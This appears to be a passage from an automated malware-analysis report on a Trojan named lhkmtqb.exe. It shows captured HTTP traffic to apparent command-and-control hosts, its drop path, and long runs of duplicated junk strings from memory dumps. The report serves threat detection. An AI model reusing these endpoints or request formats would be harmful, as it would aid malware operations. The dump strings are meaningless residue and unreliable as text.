Content-Type: text/html; Charset=GB2312
Cache-control: private
1....
POST /GetData.asp HTTP/1.1
Referer: hXXp://VVV.baidu.com/s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)
Content-Type: application/x-www-form-urlencoded;
Host: 1.rwdns.com
Content-Length: 28
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSRTRSQB=EOHLPBHDNHBAGLHMPFAICOBF
SN=ClientGetV6ZiRanKey&SP=IE
HTTP/1.1 200 OK
Date: Sun, 28 Dec 2014 21:46:44 GMT
Server: Microsoft-IIS/6.0
Content-Length: 1
Content-Type: text/html; Charset=GB2312
Cache-control: private
0..
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 167
Cache-Control: no-cache
parems=2432928EC233CF1BE823ED4456E8F82B777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF19AF5B126F7E96641757E723256467E1BF7D301DE01B02C3D4024F79AC3D8754C
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:05 GMT
32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928....
POST /ClientAPI/flowtaskAPI.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: flow3002.6299.cc
Content-Length: 167
Cache-Control: no-cache
parems=2432928EC233CF1BE823ED4456E8F82B777ED11BE4AC5DE49967D124D13CEF98EF810CC1EC1C4239C27CCA4BBE161DF19AF5B126F7E96641757E723256467E1BF7D301DE01B02C3D4024F79AC3D8754C
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 28 Dec 2014 21:57:15 GMT
32A45B4F6626435761CCBF7971D304AB3076C5A18E5564FC35BC8069371D182A7DDA4F0F0924FF9486B9213262CCB928..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
lhkmtqb.exe_592:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
D$tCPQ
D$tCPQ
SSSSSh
SSSSSh
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
COMCTL32.dll
COMCTL32.dll
%Documents and Settings%\All Users\Application Data\DownloadSave\
%Documents and Settings%\All Users\Application Data\DownloadSave\
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe
%Documents and Settings%\All Users\Application Data\DownloadSave\lhkmtqb.exe
.nua-
.nua-
.aRdY
.aRdY
-V.VT
-V.VT
.9x
.9x
m%%f:^W
m%%f:^W
.mL63
.mL63
5.zh7P*
5.zh7P*
%U)er
%U)er
oD\.aQ
oD\.aQ
&%f
&%f
Y).QF
Y).QF
MXX%X~
MXX%X~
nJ.uo
nJ.uo
V{%sK
V{%sK
/.ZYM
/.ZYM
5%Sz6
5%Sz6
Q#.UA
Q#.UA
%ue{}
%ue{}
W.Zg8vl
W.Zg8vl
.OfXf
.OfXf
n.Pb\
n.Pb\
&I.YI
&I.YI
#.YMs6
#.YMs6
4Fi.Ft
4Fi.Ft
*.LL4UM
*.LL4UM
c?%DX
c?%DX
.tLw\
.tLw\
0vF.Jm?
0vF.Jm?
|T%uj
|T%uj
.lsxQ
.lsxQ
s.HI.
s.HI.
3asw%d
3asw%d
.KNLw]X=
.KNLw]X=
1,.cP
1,.cP
)3.ea
)3.ea
O%XS 7
O%XS 7
b`web
b`web
K%X[y
K%X[y
d,.PZ
d,.PZ
l.VSD{
l.VSD{
-zG}E
-zG}E
G.RUx
G.RUx
x
x
2A.ge
2A.ge
)O.cv-
)O.cv-
C%u*
C%u*
>%X6)TF3 Y
>%X6)TF3 Y
8.JY~(
8.JY~(
^.YUu
^.YUu
fTPQ
fTPQ
``.Bf
``.Bf
;J.HJ
;J.HJ
w%c?2b
w%c?2b
.mDelUk
.mDelUk
x.aH;T
x.aH;T
@ERG.UVp
@ERG.UVp
:.dbq
:.dbq
%xoH*
%xoH*
TFz.JY
TFz.JY
-F}I8
-F}I8
<.bld>
<.bld>
Q.eRm
Q.eRm
"%sR\
"%sR\
f [W.TM80
f [W.TM80
.Zqc)
.Zqc)
9o%0sR
9o%0sR
v.SYb
v.SYb
.zgWe
.zgWe
.eD)S
.eD)S
FD
FD
2*%Xu
2*%Xu
~.vi3x
~.vi3x
).uk;
).uk;
"SZ.YW
"SZ.YW
K/.Vj
K/.Vj
xSQl
xSQl
IB(%F
IB(%F
>C'%C
>C'%C
W-pg}
W-pg}
.Zp]~
.Zp]~
-Xf}=
-Xf}=
)%FtG
)%FtG
j?tcp
j?tcp
;8%U}hUv
;8%U}hUv
i.uC)F
i.uC)F
.bD(Ph
.bD(Ph
!..LA
!..LA
R\.VK
R\.VK
l1.PR
l1.PR
4,.Oc
4,.Oc
x{PGM%CM
x{PGM%CM
.bT%8
.bT%8
V=?{B%X,
V=?{B%X,
&j.xk
&j.xk
}Zn.tP
}Zn.tP
55.pS
55.pS
~.OAKgN
~.OAKgN
.ZUeJ
.ZUeJ
SO.zBQ
SO.zBQ
fYRÃ
fYRÃ
%UjsM
%UjsM
-m}l6
-m}l6
%2@U.Wp
%2@U.Wp
pQS%U
pQS%U
'5(.s)CRt{
'5(.s)CRt{
%CQQ3cp
%CQQ3cp
R5.rP
R5.rP
@p.WJ
@p.WJ
XF.fE
XF.fE
u.NJ%
u.NJ%
.pdB4
.pdB4
$z.QmmR
$z.QmmR
u%UtS
u%UtS
>,%c@
>,%c@
eaxt%x
eaxt%x
ApCmD
ApCmD
98.CA
98.CA
G.gLa
G.gLa
)%d*M
)%d*M
!.UVU
!.UVU
|.rGz
|.rGz
.yM85
.yM85
P/.Fy
P/.Fy
lY.iCFv
lY.iCFv
1.mW:f
1.mW:f
'YR.OFx
'YR.OFx
4z.OG
4z.OG
.mHZgp][
.mHZgp][
v^.Ng
v^.Ng
.AZZ#
.AZZ#
T}8%U
T}8%U
.xS%DgS
.xS%DgS
.cI@=
.cI@=
Tudp
Tudp
%D"A,
%D"A,
.qw4\
.qw4\
Xm.Hh
Xm.Hh
P~jÂg
P~jÂg
W@.IA
W@.IA
-.SAig~%
-.SAig~%
'.TH}q
'.TH}q
O.QB%~V
O.QB%~V
^.IC=
^.IC=
-56%FL
-56%FL
.zt?%
.zt?%
Do.EJ*
Do.EJ*
C.oMd
C.oMd
.oW$(
.oW$(
LE.AI
LE.AI
g.XB3(
g.XB3(
IM.RJ
IM.RJ
Ue.vz
Ue.vz
%C%*bq
%C%*bq
87(%c
87(%c
.EZ3xl
.EZ3xl
89VG%sOV>
89VG%sOV>
A%XYK
A%XYK
%Fv@4
%Fv@4
P{1%S@
P{1%S@
%X5r"
%X5r"
?n.UG
?n.UG
.kmDo
.kmDo
-D}F21
-D}F21
r.AUao
r.AUao
MÂU
MÂU
k".ci
k".ci
PNÃ
PNÃ
qEk.gGU
qEk.gGU
I732.jV
I732.jV
iK.EJ
iK.EJ
%sl13
%sl13
.cM6T
.cM6T
>.qrf
>.qrf
.EYpx
.EYpx
a!.fY
a!.fY
5.wJc
5.wJc
%U[y
%U[y
BTizU%s_t
BTizU%s_t
.JZszb6
.JZszb6
&"r%u
&"r%u
*}Vt%f
*}Vt%f
3J.jM
3J.jM
%F;]m
%F;]m
o.uy9
o.uy9
:{.dKWD
:{.dKWD
.Uf":j
.Uf":j
.DGD:
.DGD:
'*%x9
'*%x9
G|[o.nS
G|[o.nS
L.VN'
L.VN'
w 5Ã’
w 5Ã’
k;%xn
k;%xn
.TIu|9
.TIu|9
(S.be
(S.be
.ep&9
.ep&9
6s%FN*
6s%FN*
q:\u6
q:\u6
_Q.fB
_Q.fB
"%x"po
"%x"po
.kk0\
.kk0\
o.iSLB:
o.iSLB:
?zÿa
?zÿa
.OszT{
.OszT{
F.Zcq
F.Zcq
%DoBm
%DoBm
.S.sk
.S.sk
DO%Ug
DO%Ug
%DpJE>k
%DpJE>k
C;.CP~
C;.CP~
.QsXOXT(
.QsXOXT(
R.OHZ
R.OHZ
.AqcE)p
.AqcE)p
9..Zj
9..Zj
ik;%xp
ik;%xp
,.Qaw
,.Qaw
Ph8;%UW
Ph8;%UW
.ctC/
.ctC/
%F\ o
%F\ o
GN.QL
GN.QL
X.aX/
X.aX/
O.kCD
O.kCD
?o3%X
?o3%X
aY:p!%D
aY:p!%D
V.Tdf
V.Tdf
gZ%sQY
gZ%sQY
&.jY0
&.jY0
Q.kH0
Q.kH0
j!%Ub
j!%Ub
2B.hO
2B.hO
rp*Q%x~
rp*Q%x~
D.bKX.T
D.bKX.T
oG [.%u
oG [.%u
rs.bM~
rs.bM~
5vYt.gX
5vYt.gX
|.Aw)
|.Aw)
GAI.wg
GAI.wg
7b.Yc~Z.>
7b.Yc~Z.>
9.nQ=
9.nQ=
.fW~Zm
.fW~Zm
./.Xi
./.Xi
Wu.fE
Wu.fE
.Xc!7
.Xc!7
A5f;MsG\
A5f;MsG\
-3}&.
-3}&.
.sH#
.sH#
.IoEF3
.IoEF3
eÃR
eÃR
57 .wf\Z
57 .wf\Z
Qs^%c
Qs^%c
.txs12&
.txs12&
#o2%x
#o2%x
7@.ty9
7@.ty9
(u%uc
(u%uc
%Sb=h
%Sb=h
(sshD#
(sshD#
1%cJWc
1%cJWc
%.RiJ
%.RiJ
`w.drj
`w.drj
%D:g'M
%D:g'M
vMSG
vMSG
.WT;_
.WT;_
.MUy\
.MUy\
.Zpg8
.Zpg8
%fwV6
%fwV6
z.vV~YC3
z.vV~YC3
|Gn.rV^\2~
|Gn.rV^\2~
>ut.kv
>ut.kv
.Xlev
.Xlev
s.pMM
s.pMM
O=?%f/p~n
O=?%f/p~n
%SNRr
%SNRr
m}j/%D
m}j/%D
2fT.zU
2fT.zU
.lE$aG
.lE$aG
7\{%U
7\{%U
!.uT?u
!.uT?u
.iK3b
.iK3b
$^.XH
$^.XH
NON}8.gi
NON}8.gi
L.SOL
L.SOL
-a}E'
-a}E'
DaaW.Cf
DaaW.Cf
LEXE:7
LEXE:7
.pA-]\
.pA-]\
lWEB
lWEB
%FWz^a
%FWz^a
e%C`V
e%C`V
.CSO1t#
.CSO1t#
ul.dw7@JB
ul.dw7@JB
~z-n2.VGt
~z-n2.VGt
&a%SV/
&a%SV/
VC.akjt
VC.akjt
%cx/b
%cx/b
CRt}U
CRt}U
÷foM
÷foM
jGweB
jGweB
Y0%dY
Y0%dY
2`H.DK
2`H.DK
%uO/_
%uO/_
.Rp@b
.Rp@b
H.XOO:s,P
H.XOO:s,P
Y3.iw
Y3.iw
.NR1(>Rx
.NR1(>Rx
.gW?Uc
.gW?Uc
.jOMw
.jOMw
.SD$^
.SD$^
~rX%X=
~rX%X=
W7%Um
W7%Um
.PYWA
.PYWA
,4urL
,4urL
?Ru.wP
?Ru.wP
Jx@t.yJ
Jx@t.yJ
Y.Gph$
Y.Gph$
t=.FwL
t=.FwL
.Yr~3a
.Yr~3a
_.ku]9
_.ku]9
BR%.tY
BR%.tY
%x~'m!
%x~'m!
C`.wzd
C`.wzd
`S%s|B
`S%s|B
;ús1
;ús1
$.YVcJ
$.YVcJ
.fism
.fism
.YW`1
.YW`1
.sTF(
.sTF(
k%.bs
k%.bs
0.XW~-p
0.XW~-p
C6.ET
C6.ET
".qZ)
".qZ)
O*Iu-.iC
O*Iu-.iC
.kb"]
.kb"]
u.Wo-
u.Wo-
=&cZ8.rP
=&cZ8.rP
MÚz
MÚz
v#.qG
v#.qG
,-9}!@*
,-9}!@*
yo%s
yo%s
{.pK8P
{.pK8P
%DZxN
%DZxN
.NpDD
.NpDD
%XS Jc
%XS Jc
.sju_h
.sju_h
>.WRV
>.WRV
.mKTj
.mKTj
.yd
.yd
}~q2%U
}~q2%U
cs.lvd
cs.lvd
Ul
Ul
MzcGk%D
MzcGk%D
&7#\.RY
&7#\.RY
iM.Wx
iM.Wx
G.bUdX Nb"
G.bUdX Nb"
4!N%c#
4!N%c#
%xS%Z
%xS%Z
T.oJ.
T.oJ.
.ig7ij
.ig7ij
7Y.Yfn
7Y.Yfn
Uls%U
Uls%U
Fbu.MT
Fbu.MT
".lA=
".lA=
,CMdx
,CMdx
-/iS#~%S
-/iS#~%S
h%u=9l
h%u=9l
t4%Xd
t4%Xd
U*.YT
U*.YT
yJOiNl
yJOiNl
}_KeY~
}_KeY~
M8%X{u
M8%X{u
a%X&a
a%X&a
_(|.eK*
_(|.eK*
G0.sBHg
G0.sBHg
?9sql$
?9sql$
^.bIT
^.bIT
6.nHP
6.nHP
.UP-%IA
.UP-%IA
[z%dm
[z%dm
l#f.PiOY
l#f.PiOY
M_%UZ
M_%UZ
%DG?L
%DG?L
%xb@n3kX
%xb@n3kX
X'X%uT
X'X%uT
.PSf]
.PSf]
4^X.xc
4^X.xc
k4.dw
k4.dw
%C@njx
%C@njx
.wL7#
.wL7#
.Xs~TI
.Xs~TI
7Fj.KHM
7Fj.KHM
Ën 0,_
Ën 0,_
hyID%u
hyID%u
keys
keys
c;<.ffm>
c;<.ffm>
n.pZh
n.pZh
vQ%CP
vQ%CP
4?%dSfM
4?%dSfM
n%dXA h5r
n%dXA h5r
.USi*
.USi*
!n.pT
!n.pT
^.bdx
^.bdx
u.Yn X
u.Yn X
@$.vM
@$.vM
egSD%S
egSD%S
.dRh=
.dRh=
BCrT
BCrT
Mr.ag
Mr.ag
DZc%u
DZc%u
9
9
d.tU(
d.tU(
.uA10
.uA10
[IP%X
[IP%X
e.nE]
e.nE]
)1.fU
)1.fU
|.GLK
|.GLK
FY.QZPV
FY.QZPV
;.%u\-ib
;.%u\-ib
#S.WB
#S.WB
V>:%fP
V>:%fP
8.jW
8.jW
.ec?fp^M
.ec?fp^M
.Ppe@
.Ppe@
0%uF,
0%uF,
( -D}{
( -D}{
.GezD8
.GezD8
Mr.EF
Mr.EF
.INlo
.INlo
WEBvV
WEBvV
.mFe,
.mFe,
?:ftP
?:ftP
%CM36
%CM36
ðnyVI
ðnyVI
.qE#h
.qE#h
9.mt>:
9.mt>:
?n2.Mymj
?n2.Mymj
E%xbB>
E%xbB>
%5x1Ei
%5x1Ei
"|.Ll
"|.Ll
G.IU/
G.IU/
ûhl;Q
ûhl;Q
a.mYX4
a.mYX4
X^.FkJ
X^.FkJ
q={%u
q={%u
%UdM)
%UdM)
B9)l.emk7
B9)l.emk7
s.aT`Y
s.aT`Y
%.Xd'
%.Xd'
7.Vxn
7.Vxn
W:\We2
W:\We2
&!%Sf
&!%Sf
\M:`.cS
\M:`.cS
u i%S
u i%S
;(.FA
;(.FA
l:\i7f
l:\i7f
I%0x
I%0x
%UXC-j;!6
%UXC-j;!6
(.HAp-
(.HAp-
87.Rfu
87.Rfu
%DT.$Y
%DT.$Y
cGT".Xd
cGT".Xd
o>.soO
o>.soO
.eRN)i
.eRN)i
Q7.Iu}0
Q7.Iu}0
k#%cS
k#%cS
?P'zu}O%D%
?P'zu}O%D%
Np%Xg
Np%Xg
b.DA&
b.DA&
`|.BB
`|.BB
.MoeCDk$
.MoeCDk$
$.RG,
$.RG,
rE)n=%s
rE)n=%s
.KGbk
.KGbk
(.nw:
(.nw:
-%2T%c
-%2T%c
iS%x9
iS%x9
.jZvW
.jZvW
\QeXe
\QeXe
/}.uz
/}.uz
.wK5M
.wK5M
.fjMu/0
.fjMu/0
O~c.bw6.
O~c.bw6.
'.nt-
'.nt-
.aNV.GF;
.aNV.GF;
udw%U
udw%U
}%S0X8t
}%S0X8t
~
~
5f@%f
5f@%f
nh%Dp6
nh%Dp6
!.uHn
!.uHn
.rPml
.rPml
%dyv2N.
%dyv2N.
.FxOl
.FxOl
&.zy:
&.zy:
y .XC
y .XC
.pm/-
.pm/-
6.neXb
6.neXb
<_.ew>
<_.ew>
.XP0.'
.XP0.'
v6.klT
v6.klT
#[w.xD
#[w.xD
{.Waf>aR
{.Waf>aR
%X)Ä
%X)Ä
Z{%f/
Z{%f/
.Om*U2
.Om*U2
.pQGF
.pQGF
%Fre&
%Fre&
".jF
".jF
m8Z%sO
m8Z%sO
K6.zz
K6.zz
3.SPn(4w
3.SPn(4w
-GUe.zu
-GUe.zu
wK.xA
wK.xA
Z.HZ&
Z.HZ&
K/%sK
K/%sK
.dtC#J
.dtC#J
;sqld
;sqld
q.HFN
q.HFN
)3.Jd
)3.Jd
}TZ%.D
}TZ%.D
*[KeyW6N#
*[KeyW6N#
?%u4D
?%u4D
&D!Yn %cg
&D!Yn %cg
.JhzJ\R[
.JhzJ\R[
%f{1
%f{1
%fMZ&
%fMZ&
CúW
CúW
zf"@.hx)
zf"@.hx)
.HReM
.HReM
]].tn
]].tn
.Lpj7M
.Lpj7M
%F fC
%F fC
.thm|SB
.thm|SB
N2%ukW:
N2%ukW:
wp%ct
wp%ct
9E.BC
9E.BC
V.pO0M
V.pO0M
.rWYn
.rWYn
c%sNy
c%sNy
t.EMw0
t.EMw0
.xU#J
.xU#J
d/%fN
d/%fN
%S3ni)
%S3ni)
.wb`c4I
.wb`c4I
`.TJi
`.TJi
.vAIa
.vAIa
XC.av
XC.av
2~%U_
2~%U_
JZ.Vz
JZ.Vz
6O.puR
6O.puR
EÔ@
EÔ@
\O.WX(
\O.WX(
4õ)z
4õ)z
^Q %S
^Q %S
.kOTD
.kOTD
.lgWH
.lgWH
IÓy
IÓy
.JA1SN
.JA1SN
%cO,WS!%;
%cO,WS!%;
.lfZ@
.lfZ@
Y;%F'
Y;%F'
2.JeI
2.JeI
&t.Yw
&t.Yw
9-mNc}
9-mNc}
NuDP
NuDP
uDplm
uDplm
Y(%F=
Y(%F=
m.Ey,]
m.Ey,]
.COow
.COow
v2.NP
v2.NP
@*5%x
@*5%x
Mr@B.lsN
Mr@B.lsN
:B2|%ut
:B2|%ut
E,9NT%So
E,9NT%So
`.OzI
`.OzI
d%UWG
d%UWG
?t-P}.
?t-P}.
{b.BK
{b.BK
D%Xm"
D%Xm"
rKc%s?
rKc%s?
_M%SF
_M%SF
ut-f}
ut-f}
cHs.qW
cHs.qW
e:\-drxP:4
e:\-drxP:4
{M.aD
{M.aD
GCmDF
GCmDF
tCPuv
tCPuv
Hx#%x
Hx#%x
.WQ3 1AT
.WQ3 1AT
V.Uj-a
V.Uj-a
& .AL
& .AL
.vYUPw
.vYUPw
Q#\.Pt
Q#\.Pt
yoQN.rB
yoQN.rB
]}T%C'oC
]}T%C'oC
-.lhA
-.lhA
C^.AX%
C^.AX%
2%I%c
2%I%c
%xKyB
%xKyB
;b=Å’
;b=Å’
f.DBq
f.DBq
sm%Um
sm%Um
E:\#6
E:\#6
%d_i{
%d_i{
);%xl
);%xl
.dDG_I
.dDG_I
Aj.xs
Aj.xs
.DX{YV
.DX{YV
..z.Zb
..z.Zb
e?.RZ
e?.RZ
BR2Z.INpW
BR2Z.INpW
ZF.LH
ZF.LH
k%s.9/
k%s.9/
2
2
.dy.jkt
.dy.jkt
e:\.;
e:\.;
%F=@-
%F=@-
c.ctZ
c.ctZ
waL.DIz
waL.DIz
.BO R
.BO R
H"B%S
H"B%S
.wAqD
.wAqD
>rl .JMTG
>rl .JMTG
r%X~eg
r%X~eg
$6L.oiTJ
$6L.oiTJ
n%u4$
n%u4$
OE.jl
OE.jl
l6.rD
l6.rD
w}sqLQ
w}sqLQ
*0e3.uix
*0e3.uix
t/.aq9
t/.aq9
.CL5h
.CL5h
ZiC!F.NQ
ZiC!F.NQ
ki-G}
ki-G}
O.vdxj*S
O.vdxj*S
C9D.aN7&
C9D.aN7&
U:V%D
U:V%D
%FZ= K
%FZ= K
ZvL.Hs
ZvL.Hs
.wnJ\
.wnJ\
g
g
&%cG.
&%cG.
GD.hv
GD.hv
$>_%s
$>_%s
o#.ZJ]
o#.ZJ]
N>.cUX
N>.cUX
="u2%X}v
="u2%X}v
.EM{,
.EM{,
Jo.zMJ
Jo.zMJ
h.yqr
h.yqr
-as4}
-as4}
Ux
Ux
.ED%c
.ED%c
új=
új=
H\ 7%U
H\ 7%U
3q1%F
3q1%F
g-n%x
g-n%x
"2K.mE
"2K.mE
X%.ip]k
X%.ip]k
.KXz#
.KXz#
.aEf=
.aEf=
bB/%x@
bB/%x@
AG.ZR
AG.ZR
.xLsf
.xLsf
.wg8R
.wg8R
{dn.Py
{dn.Py
l6ú$
l6ú$
\uyT.sYr
\uyT.sYr
n.grm
n.grm
b.qtq
b.qtq
k]%Xvi
k]%Xvi
.BK1z$
.BK1z$
3[%F%
3[%F%
@.vu?0
@.vu?0
kWG.EQ
kWG.EQ
>\.hmU
>\.hmU
.jivI
.jivI
Eh.gS
Eh.gS
.=^.KJ
.=^.KJ
56%Du
56%Du
8.QN6
8.QN6
`d%S\h
`d%S\h
%X(J5
%X(J5
`.DJp
`.DJp
kBL%D
kBL%D
.ugZ6
.ugZ6
l81%F
l81%F
T%sB$
T%sB$
2t8.gc
2t8.gc
'.CP_
'.CP_
3~.MAnW
3~.MAnW
.rs>m
.rs>m
SZl%X
SZl%X
h%DmT)_
h%DmT)_
}.EL[
}.EL[
j=.hD^
j=.hD^
CRTz
CRTz
M( %C
M( %C
k"|wEb
k"|wEb
B.IF(0
B.IF(0
N@L%U
N@L%U
.GO1EH
.GO1EH
%clW!
%clW!
q$exe
q$exe
yl$.Lm
yl$.Lm
-g5%u
-g5%u
u \%X
u \%X
TG#.hz*r
TG#.hz*r
63n%c/
63n%c/
5.oY{
5.oY{
:.Sha
:.Sha
H]..vYA
H]..vYA
*T%?.ys
*T%?.ys
Hm.vF
Hm.vF
)^.gI
)^.gI
lqK.Wl
lqK.Wl
'.Wg2XN
'.Wg2XN
]Q%ScF
]Q%ScF
QW.SB
QW.SB
r.fAZ
r.fAZ
p .sf
p .sf
-H}_s
-H}_s
|O:%D!
|O:%D!
.gjNPK
.gjNPK
m0F?3u{#,%X
m0F?3u{#,%X
-wa}o
-wa}o
%F |J
%F |J
5.Oen
5.Oen
)Bv%c
)Bv%c
GN{%C(h0
GN{%C(h0
C.UDgo
C.UDgo
=$.mz
=$.mz
u>"%f/
u>"%f/
4eA%D
4eA%D
C6.yz
C6.yz
o.AHvyA
o.AHvyA
IM%%x6
IM%%x6
YCH.EL
YCH.EL
cSfq&%x'
cSfq&%x'
r.RR8
r.RR8
-.VA%
-.VA%
d EXe
d EXe
%DQ Ki
%DQ Ki
XyGG|`Zc.Hu&
XyGG|`Zc.Hu&
Ty.zg\
Ty.zg\
Q.tSF&
Q.tSF&
,.HTbH
,.HTbH
76e&%X
76e&%X
>rd.yo =b
>rd.yo =b
J&.tI
J&.tI
o:.TU
o:.TU
h%FP(
h%FP(
P.fNu
P.fNu
6%xhf
6%xhf
R@.Tf5w
R@.Tf5w
.od$"
.od$"
FTP8f35E\5
FTP8f35E\5
.fknk
.fknk
D&%XB
D&%XB
q.sG4
q.sG4
$A4i.rK2k
$A4i.rK2k
Qi.nnS
Qi.nnS
C}.BC
C}.BC
7mSgf
7mSgf
S
S
=Gc7:5R.od>D
=Gc7:5R.od>D
& r%s
& r%s
&C%s;
&C%s;
fK.ue
fK.ue
k-bF}i
k-bF}i
6.ifl
6.ifl
O%xBs
O%xBs
&-0};d*w
&-0};d*w
W%d,D&
W%d,D&
%FK9RZ
%FK9RZ
.PfyT
.PfyT
%D}&zP
%D}&zP
v.Pg&
v.Pg&
l:z`.ya
l:z`.ya
!E.FsM
!E.FsM
Ip.XF
Ip.XF
D%xUz
D%xUz
d6.NOX
d6.NOX
%D)%^";"(|
%D)%^";"(|
%FS?h.
%FS?h.
I$DAn.zU
I$DAn.zU
?)%fW
$0A%u2
$0A%u2
2qep%U
2qep%U
.lne`
.lne`
.UGC9
.UGC9
.OYXjM
.OYXjM
[.kk8"
[.kk8"
_%XAA
_%XAA
)v.Fqm
)v.Fqm
tP"%dK
tP"%dK
}h.aen
}h.aen
)=.JB
)=.JB
E.krs
E.krs
%S;]NDA
%S;]NDA
vË8
vË8
@.zP*m
@.zP*m
LCb&w%Sh
LCb&w%Sh
lc.Lj;
lc.Lj;
.fMnjVwA8Ve
.fMnjVwA8Ve
)%C::x
)%C::x
-D}Ba
-D}Ba
w.oyr,
w.oyr,
w.BL$
w.BL$
'u%Xioc
'u%Xioc
J0.Wn
J0.Wn
.pHe7xP3
.pHe7xP3
I%X}-4
I%X}-4
?.lP"
?.lP"
.Jfrr
.Jfrr
z%X[G
z%X[G
u.jG'
u.jG'
.MdBF
.MdBF
u;|WJ%Ud$`
u;|WJ%Ud$`
-s}k'
-s}k'
%uwY6
%uwY6
.Dzew
.Dzew
}/}.zd
}/}.zd
]0%sH'
]0%sH'
5B%FX
5B%FX
!%snD
!%snD
?.eQy
?.eQy
Z(.lV
Z(.lV
Q`k%d
Q`k%d
,.mi0
,.mi0
~_.fK
~_.fK
\.mkS
\.mkS
W%U35
W%U35
.DyT'
.DyT'
i.yxd
i.yxd
.GR$j
.GR$j
7.FB2
7.FB2
,.YI}
,.YI}
.Moj,
.Moj,
.ENMo
.ENMo
\sM.CJ
\sM.CJ
m.rRm/_
m.rRm/_
HaK.Gp
HaK.Gp
>Ut.zZ4p
>Ut.zZ4p
=T.NC
=T.NC
x5.wMKic&D
x5.wMKic&D
Ap=wv/'~.Ac
Ap=wv/'~.Ac
b%CTr
b%CTr
wEbq
wEbq
k8.fs
k8.fs
S>D%cM@
S>D%cM@
P e.ns
P e.ns
cc.Lcr
cc.Lcr
xC.sP
xC.sP
!.HT]
!.HT]
.OOIs
.OOIs
.MSEq.
.MSEq.
.db]gV
.db]gV
%S1uM
%S1uM
>4Zs.Mg
>4Zs.Mg
.lzHe
.lzHe
x%S=qg
x%S=qg
3*.Ilu
3*.Ilu
.ovue
.ovue
*.jd9b
*.jd9b
Xx.Ce.
Xx.Ce.
3.SZd
3.SZd
/.ezv
/.ezv
`aI%uk
`aI%uk
O.iGK
O.iGK
pA/\5.XE
pA/\5.XE
nS%cq
nS%cq
8Z.XS1
8Z.XS1
>..Li
>..Li
.rWVj
.rWVj
.Ls9r
.Ls9r
[wi.ls7
[wi.ls7
p .XX
p .XX
)7.iQkb
)7.iQkb
hS].qp
hS].qp
[Ch.fCR
[Ch.fCR
I:>0`%F
I:>0`%F
,(3%u
,(3%u
p.QG~h
p.QG~h
%FQL6
%FQL6
%UJ3{
%UJ3{
%uA1"Vz
%uA1"Vz
U:{.bZ
U:{.bZ
.QnJg
.QnJg
.oNmV
.oNmV
#pTB-X}U
#pTB-X}U
{^V%d
{^V%d
c2@%xb
c2@%xb
5.RF0
5.RF0
\c.vfn
\c.vfn
8P.YKI
8P.YKI
? -\*:\>
? -\*:\>
$SQl'g
$SQl'g
$%c 4
$%c 4
TCPg
TCPg
%d'KX))8$
%d'KX))8$
/4k.hh;
/4k.hh;
)4.KM>
)4.KM>
`>%S~6
`>%S~6
.az2?>
.az2?>
b.TtF
b.TtF
a*[L%dR
a*[L%dR
~0.er
~0.er
G5.jo,!
G5.jo,!
q.bj>
q.bj>
Hq%FR
Hq%FR
H%U6u
H%U6u
Ob%Xc
Ob%Xc
o.hWB(
o.hWB(
<.uri>
<.uri>
.lN5B
.lN5B
V\.CS
V\.CS
Urld
Urld
&.cgow:>S$
&.cgow:>S$
yC.vI
yC.vI
.Vwx^4
.Vwx^4
eH.WD
eH.WD
sV-b}
sV-b}
ÃŒQ4
ÃŒQ4
^${.Nvf
^${.Nvf
.pk1G
.pk1G
.Ulhs
.Ulhs
S.Nla
S.Nla
1, 0, 0, 1
1, 0, 0, 1
AliIM.exe
AliIM.exe
lhkmtqb.exe_336:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
D$tCPQ
D$tCPQ
SSSSSh
SSSSSh
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
COMCTL32.dll
COMCTL32.dll
%Documents and Settings%\All Users\Application Data\DownloadSave\
%Documents and Settings%\All Users\Application Data\DownloadSave\
%Documents and Settings%\All Users\Application Data\DownloadSave\ lhkmtqb.exe
%Documents and Settings%\All Users\Application Data\DownloadSave\ lhkmtqb.exe
.nua-
.nua-
.aRdY
.aRdY
-V.VT
-V.VT
.9x
.9x
m%%f:^W
m%%f:^W
.mL63
.mL63
5.zh7P*
5.zh7P*
%U)er
%U)er
oD\.aQ
oD\.aQ
&%f
&%f
Y).QF
Y).QF
MXX%X~
MXX%X~
nJ.uo
nJ.uo
V{%sK
V{%sK
/.ZYM
/.ZYM
5%Sz6
5%Sz6
Q#.UA
Q#.UA
%ue{}
%ue{}
W.Zg8vl
W.Zg8vl
.OfXf
.OfXf
n.Pb\
n.Pb\
&I.YI
&I.YI
#.YMs6
#.YMs6
4Fi.Ft
4Fi.Ft
*.LL4UM
*.LL4UM
c?%DX
c?%DX
.tLw\
.tLw\
0vF.Jm?
0vF.Jm?
|T%uj
|T%uj
.lsxQ
.lsxQ
s.HI.
s.HI.
3asw%d
3asw%d
.KNLw]X=
.KNLw]X=
1,.cP
1,.cP
)3.ea
)3.ea
O%XS 7
O%XS 7
b`web
b`web
